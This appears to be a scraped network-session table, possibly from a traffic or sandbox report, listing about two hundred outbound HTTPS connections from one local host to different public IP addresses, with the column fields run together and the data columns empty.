                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19870192.168.2.1444694109.108.163.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19871192.168.2.143509227.105.151.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19872192.168.2.1445258112.44.113.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19873192.168.2.145501253.23.45.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19874192.168.2.1445546142.243.202.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19875192.168.2.146016076.49.182.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19876192.168.2.145188872.50.202.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19877192.168.2.1445402180.57.177.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19878192.168.2.1458006155.155.106.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19879192.168.2.1445494220.57.220.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19880192.168.2.145453252.230.255.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19881192.168.2.145155499.18.236.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19882192.168.2.1456124217.71.233.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19883192.168.2.1435706151.179.140.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19884192.168.2.1438590149.215.210.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19885192.168.2.1441450210.89.131.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19886192.168.2.145979695.111.114.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19887192.168.2.1439852188.239.52.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19888192.168.2.144793013.128.188.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19889192.168.2.143745892.248.242.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19890192.168.2.1440094102.72.176.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19891192.168.2.144441494.151.69.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19892192.168.2.145968020.231.250.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19893192.168.2.144734236.21.188.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19894192.168.2.1459336158.88.35.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19895192.168.2.144613880.138.100.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19896192.168.2.145018699.100.147.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19897192.168.2.1455654137.30.86.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19898192.168.2.143293670.26.188.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19899192.168.2.144335834.99.192.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19900192.168.2.145349479.233.174.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19901192.168.2.1455066147.210.209.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19902192.168.2.1447738203.228.216.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19903192.168.2.145728836.42.128.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19904192.168.2.145165286.90.215.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19905192.168.2.146079083.206.209.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19906192.168.2.1444866191.108.78.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19907192.168.2.145504658.73.49.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19908192.168.2.1439846149.84.232.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19909192.168.2.144019849.0.158.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19910192.168.2.143564434.138.0.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19911192.168.2.1451404119.143.61.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19912192.168.2.1442418167.162.84.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19913192.168.2.1458370220.209.147.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19914192.168.2.145532637.8.145.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19915192.168.2.144212675.129.168.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19916192.168.2.1445236186.67.35.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19917192.168.2.1444200206.147.86.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19918192.168.2.145461457.55.68.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19919192.168.2.1436396154.228.5.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19920192.168.2.1460054187.53.251.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19921192.168.2.1448040185.19.129.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19922192.168.2.14394022.1.222.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19923192.168.2.143499695.7.39.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19924192.168.2.1455754108.25.14.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19925192.168.2.143494483.36.84.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19926192.168.2.1440392165.254.215.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19927192.168.2.143578240.101.203.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19928192.168.2.1448850102.96.96.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19929192.168.2.1453798188.49.88.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19930192.168.2.1448536182.172.59.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19931192.168.2.1458678135.191.200.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19932192.168.2.1437062144.65.77.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19933192.168.2.145067699.89.36.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19934192.168.2.1447708142.132.21.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19935192.168.2.145065294.121.211.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19936192.168.2.143771414.79.179.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19937192.168.2.1435012170.16.138.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19938192.168.2.143400670.2.232.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19939192.168.2.1456882196.134.19.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19940192.168.2.1443346143.160.108.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19941192.168.2.1438340200.70.98.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19942192.168.2.1435796221.34.118.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19943192.168.2.1450754101.6.3.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19944192.168.2.1444858100.193.71.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19945192.168.2.145606853.37.208.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19946192.168.2.145017225.83.171.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19947192.168.2.1448338178.250.146.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19948192.168.2.1433836110.199.5.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19949192.168.2.1449478178.197.47.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19950192.168.2.1459506101.134.232.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19951192.168.2.1445230186.102.139.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19952192.168.2.144798688.13.223.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19953192.168.2.1454886216.158.219.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19954192.168.2.1436036166.176.109.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19955192.168.2.1441282111.199.110.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19956192.168.2.1448758198.102.183.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19957192.168.2.1435382121.171.51.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19958192.168.2.144018019.247.168.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19959192.168.2.1444094201.132.242.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19960192.168.2.1433518117.244.217.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19961192.168.2.1452150165.126.133.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19962192.168.2.144917819.3.182.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19963192.168.2.145182298.146.78.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19964192.168.2.145017435.32.41.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19965192.168.2.145777873.233.11.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19966192.168.2.1444168200.14.176.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19967192.168.2.1453910222.22.201.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19968192.168.2.1454876103.106.64.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19969192.168.2.144576842.40.126.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19970192.168.2.1437914195.43.2.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19971192.168.2.1441236164.30.161.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19972192.168.2.144164686.170.240.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19973192.168.2.1454060200.10.91.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19974192.168.2.1443632112.35.240.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19975192.168.2.145121883.179.51.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19976192.168.2.1444614140.1.144.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19977192.168.2.145552024.223.132.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19978192.168.2.144513694.79.232.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19979192.168.2.1455890148.237.210.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19980192.168.2.144797658.245.59.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19981192.168.2.1447122169.194.172.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19982192.168.2.1451482212.211.197.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19983192.168.2.144890241.48.216.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19984192.168.2.1435284182.126.47.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19985192.168.2.1445986134.239.149.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19986192.168.2.145595635.175.16.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19987192.168.2.1456752190.220.55.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19988192.168.2.143337223.107.254.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19989192.168.2.144214023.110.178.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19990192.168.2.1450154209.165.50.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19991192.168.2.1445138148.163.73.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19992192.168.2.1437010187.190.149.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19993192.168.2.1448178175.5.114.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19994192.168.2.14350425.142.72.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19995192.168.2.1433552202.176.197.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19996192.168.2.1448430216.209.195.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19997192.168.2.145277485.248.16.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19998192.168.2.1440152123.224.72.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19999192.168.2.146098432.176.48.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20000192.168.2.1444076137.192.161.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20001192.168.2.1458434119.137.110.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20002192.168.2.1459992129.178.252.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20003192.168.2.143536890.233.129.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20004192.168.2.144508236.77.89.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20005192.168.2.145446238.170.174.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20006192.168.2.144135494.174.223.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20007192.168.2.1443036102.196.236.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20008192.168.2.143972857.143.181.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20009192.168.2.143507458.96.212.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20010192.168.2.146065813.29.225.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20011192.168.2.145399239.223.90.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20012192.168.2.1441686183.246.59.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20013192.168.2.1433994187.60.11.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20014192.168.2.1442622100.148.253.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20015192.168.2.145439077.170.24.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20016192.168.2.1432790200.105.163.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20017192.168.2.145065812.206.105.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20018192.168.2.1435082136.171.164.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20019192.168.2.1434962124.129.216.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20020192.168.2.145965881.163.137.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20021192.168.2.1443556152.215.216.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20022192.168.2.145648040.94.244.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20023192.168.2.143386845.48.64.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20024192.168.2.1445874157.19.167.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20025192.168.2.1457164125.137.90.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20026192.168.2.1437898114.141.143.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20027192.168.2.1441296143.28.32.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20028192.168.2.1444774188.43.207.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20029192.168.2.1456838138.248.202.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20030192.168.2.143366289.43.36.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20031192.168.2.145934889.113.45.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20032192.168.2.1442898181.166.7.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20033192.168.2.144552052.130.57.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20034192.168.2.143946644.252.241.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20035192.168.2.1442186186.238.48.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20036192.168.2.144931075.223.165.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20037192.168.2.144055665.43.11.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20038192.168.2.145025283.174.151.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20039192.168.2.144232036.196.197.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20040192.168.2.1454472104.3.189.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20041192.168.2.1443314220.31.116.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20042192.168.2.1434902145.101.150.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20043192.168.2.1448560144.89.91.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20044192.168.2.14573022.0.132.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20045192.168.2.144141625.111.116.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20046192.168.2.144889651.24.81.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20047192.168.2.1446668218.231.124.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20048192.168.2.145138068.218.86.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20049192.168.2.1449068113.14.133.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20050192.168.2.1441242174.108.8.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20051192.168.2.145813623.131.115.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20052192.168.2.1448968143.106.85.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20053192.168.2.1433406174.105.245.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20054192.168.2.1454724204.217.242.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20055192.168.2.145588296.203.188.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20056192.168.2.1455796207.12.173.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20057192.168.2.1447546124.252.68.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20058192.168.2.144158879.105.227.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20059192.168.2.1450690184.248.215.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20060192.168.2.1446930139.118.179.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20061192.168.2.145311094.18.92.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20062192.168.2.143579047.31.29.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20063192.168.2.1450876140.93.7.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20064192.168.2.145553272.1.157.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20065192.168.2.1436690218.247.92.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20066192.168.2.143284817.211.173.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20067192.168.2.1437342149.177.253.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20068192.168.2.145041466.146.215.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20069192.168.2.1438724129.14.100.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20070192.168.2.145269873.139.30.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20071192.168.2.145919639.18.159.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20072192.168.2.1457754162.50.202.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20073192.168.2.145078437.226.159.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20074192.168.2.143571892.96.216.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20075192.168.2.144862497.69.25.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20076192.168.2.1449136209.187.46.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20077192.168.2.1437676139.212.72.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20078192.168.2.144626673.175.31.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20079192.168.2.145928636.200.182.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20080192.168.2.1454206203.173.234.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20081192.168.2.1457768156.116.9.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20082192.168.2.145554058.239.102.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20083192.168.2.1437052103.101.205.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20084192.168.2.1460796102.103.50.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20085192.168.2.1455296146.244.63.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20086192.168.2.1456394147.109.152.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20087192.168.2.1435284113.118.209.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20088192.168.2.1439106182.83.48.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20089192.168.2.145459069.154.11.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20090192.168.2.145196243.133.202.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20091192.168.2.1443272126.89.34.140443
